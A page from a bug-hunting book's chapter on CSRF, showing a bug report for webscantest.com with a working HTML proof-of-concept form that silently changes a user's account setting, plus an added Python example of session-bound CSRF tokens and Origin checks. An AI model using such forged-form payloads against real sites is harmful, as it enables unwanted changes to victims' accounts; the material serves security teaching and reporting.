Page 128 - Hands-On Bug Hunting for Penetration Testers
CSRF and Insecure Session Authentication Chapter 6
Attack Scenario
Although the form where we've detected our vulnerability doesn't seem to be that critical
(an individual's favorite color is not codeword-clearance-level information), the ability to
change an individual's account information through unwanted application state changes is
a serious flaw.
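As an added defender's-side illustration (example code, not from the book or from webscantest.com), here is the synchronizer-token check that the vulnerable endpoint lacks: the token is HMAC-bound to the caller's session, is required on every state-changing POST, and the Origin header is compared against the site's own origin. The secret, the `csrf_token` field name and the request bodies are constructed assumptions.

```python
import hashlib
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import parse_qs

# Constructed secret for the example; a real application loads it from configuration.
SERVER_SECRET = b"constructed-server-secret-do-not-reuse"


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to one session: nonce.HMAC(secret, session_id:nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """A token forged for, or stolen from, another session fails because the MAC covers the session id."""
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_csrfpost(session_id: str, body: str, origin: Optional[str],
                    allowed_origin: str) -> Tuple[int, str]:
    """Hardened stand-in for a favorite-color form handler (hypothetical, modelled on csrfpost.php).

    The PoC form on this page submits dummy_property and property with no token, so it is
    rejected before any account state changes. The token is the primary control; the Origin
    comparison is a second layer, applied only when the browser sends the header.
    """
    fields = parse_qs(body, keep_blank_values=True)
    token = fields.get("csrf_token", [""])[0]
    if not verify_csrf_token(session_id, token):
        return 403, "missing or invalid CSRF token"
    if origin is not None and origin != allowed_origin:
        return 403, "cross-origin request rejected"
    color = fields.get("property", [""])[0]
    return 200, f"favorite color set to {color!r}"
```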
Final Report
Let's use this information to format our submission:
CATEGORY: CSRF POST-based attack
TIME: UTC
URL: http://webscantest.com/csrf/csrfpost.php
PAYLOAD: Peasoup
METHODOLOGY: Vulnerability detected with generated CSRF PoC included in
reproduction instructions
INSTRUCTIONS TO REPRODUCE
Open the following CSRF PoC in a browser, either locally or through a
hosted environment:
<html>
<form action="http://webscantest.com/csrf/csrfpost.php"
enctype="application/x-www-form-urlencoded" method="POST">
<label>
color
</label>
<input name="dummy_property" type="text" value="">
<input name="property" type="hidden" value="Peasoup">
<input type="submit" value="http://webscantest.com/csrf/csrfpost.php">
</form>
</html>
Submit the form contained in the CSRF PoC
ATTACK SCENARIO
In the case of this POST-based CSRF attack, the vulnerability gives the
attacker the opportunity to change a piece of the user's account
information if they unwittingly submit the attacker's form. Giving a user a
Peasoup-colored car instead of a flashy Cyan one would be a breach of the
[ 113 ]

